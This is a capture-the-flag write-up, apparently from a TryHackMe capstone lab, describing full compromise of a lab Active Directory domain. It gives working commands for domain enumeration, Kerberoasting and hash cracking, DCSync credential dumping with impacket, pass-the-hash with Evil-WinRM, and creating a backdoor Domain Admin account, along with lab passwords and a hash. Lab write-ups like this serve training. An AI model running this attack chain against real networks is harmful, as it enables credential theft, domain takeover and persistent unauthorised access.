Full Compromise of CORP Domain

Used Tools

sshuttle

DNSChef

Bloodhound-python

neo4j

Bloodhound

impackets GetUserSPNs.py

Hashcat

impackets secretsdump

Evil-WinRM

Remmina

Summary

With the previously established connection through sshuttle it is possible to enumerate the domain with Bloodhound-python without the need to drop SharpHound on any machine internally. Due to DNS errors, a fake DNS via DNSChef was set up. Next, we will be using neo4j with Bloodhound to analyze the results of Bloodhound-python. The first thing that catches immediately the eye was that Administrators and Domain Admins have the capability to enable a dcsync attack. But also there were some Service Principals who are kerberostable. With the use of impackets GetUserSPNs.py we are able to get the Kerberos hashes of five Service Principals, one was crackable via Hashcat. The svcScanning account. Running Bloodhound again with the more elevated user svcScanning we find that svcBackups has also the ability for a dcsync attack. With the hope to get the credentials of svcBackups whether it is in clear text or a hash, we run impackets secretsdump with the user svcScanning and retrieve the clear text credentials of svcBackup. From there we run impackets secrectsdump again, this time with the user svcBackups, and are able to get the hash of the local administrator of the child domain controller corpdc. With this, we perform a pass-the-hash attack and pass the hash via Evil-WinRM to the child domain controller. From there we create our own user 0xb0b, adding him to the Domain Admins, and are now able to fully compromise the CORP Domain and are able to RDP into the child domain controller with the newly created user.

Investigation

First, we try to enumerate the domain with Bloodhound-python but receive a DNS error. The same issue occurred, passing the connection through ssh dynamic port forwarding and using ProxyChains. In this case --dns-tcp has to be used. To evade this problem, a fake DNS was set up.

Using Bloodhound-python with ProxyChains and DNSChef

https://www.youtube.com/watch?v=4ydjpSSKQ8g

Running the following to establish a fake DNS.

This time the command looks a bit different. The nameserver is now our localhost everything else remains the same and we are able to enumerate the domain.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/laura.wood]
└─$ bloodhound-python -d corp.thereserve.loc -u laura.wood -p 'Password1@' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1
let

let’s start neo4j and run Bloodhound to find some interesting stuff on the domain.

Just drop the files into Bloodhound.

The first thing that catches the eye is that we are able to find groups with the ability to perform dcsync attacks which might interesting for the full compromise of the parent domain. In a dcsync attack, credentials are harvested by simulating a domain controller asking to replicate information of another domain controller. This can be accomplished remotely via impackets secretdump.py or locally running mimikatz on a victim machine with lsadump::dcsync.

https://tryhackme.com/room/persistingad Persistence through Credentials

Administrators And Domain Admins are able to perform a dcsync attack.

Running GetUsersSPNs to get any information about the ServicePrincipalNames in the hope to get a more elevated user.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ /usr/share/doc/python3-impacket/examples/GetUserSPNs.py corp.thereserve.loc/laura.wood:"Password1@" -dc-ip 10.200.103.102 -request

Here we have the hashes ofsvcBackups, svcEDR, svcMonitor, svcScanning and svcOctober.

Trying to crack any of the hashes gives us the credentials of svcScanning:Password1

We chose to use mode 13100 for cracking Kerberos 5, etype 23, TGS-REP hashes.

Next, we repeat the bloodhound enumeration, this time with svcScanning.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/svcScanning]
└─$ bloodhound-python -d corp.thereserve.loc -u svcScanning -p 'Password1!' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1

After deleting the database and resetting the database stats, we drop the results of svcScanning in.

Checking out the shortest path to high value targets reveals to us the user svcBackups has also the capability to perform a dcsync attack.

Running impackets-secretsdumps with the user svcScanning in the hope to get any credentials of svcBackups or another high value target.

impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.103.31

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.103.31

svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G

And we are getting svcBackups credentials with dcsync capabilities

With this user we run again impacket-secretsdump and are able to retrieve the local Administrator hash.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ impacket-secretsdump corp.thereserve.loc/svcBackups:q9nzssaFtGHdqUV3Qv6G@10.200.103.102

Using Evil-WinRM and the pass the hash attack we are able to directly connect to the child domain controller corpdc.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ evil-winrm -u Administrator -H d3d4edcc015856e386074795aea86b3e -i 10.200.103.102

Running the following commands to add our own user and adding him to the Domain Admins.

New-ADUser 0xb0b

Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b

Set-ADAccountPassword -Identity 0xb0b -NewPassword (ConvertTo-SecureString -AsPlainText "WhoKnows1337Me?" -Force)

Enable-ADAccount -Identity '0xb0b'

Next we use Remmina to connect to the domain controller as 0xb0b.

Connected to the domain controller as our user we are able to start the command line as administrator from there we are able to reach every machine in the corp domain and placing our proof of compromises on the given locations to retrieve the flags.

Flag-4: Administrative access to Corporate Division Tier 2 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\wrk1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt

Flag-5: Foothold on Corporate Division Tier 1 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-6: Administrative access to Corporate Division Tier 1 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt

Flag-7: Foothold on Corporate Division Tier 0 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\cropdc.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-8: Administrative access to Corporate Division Tier 0 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\cropdc.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt

Last updated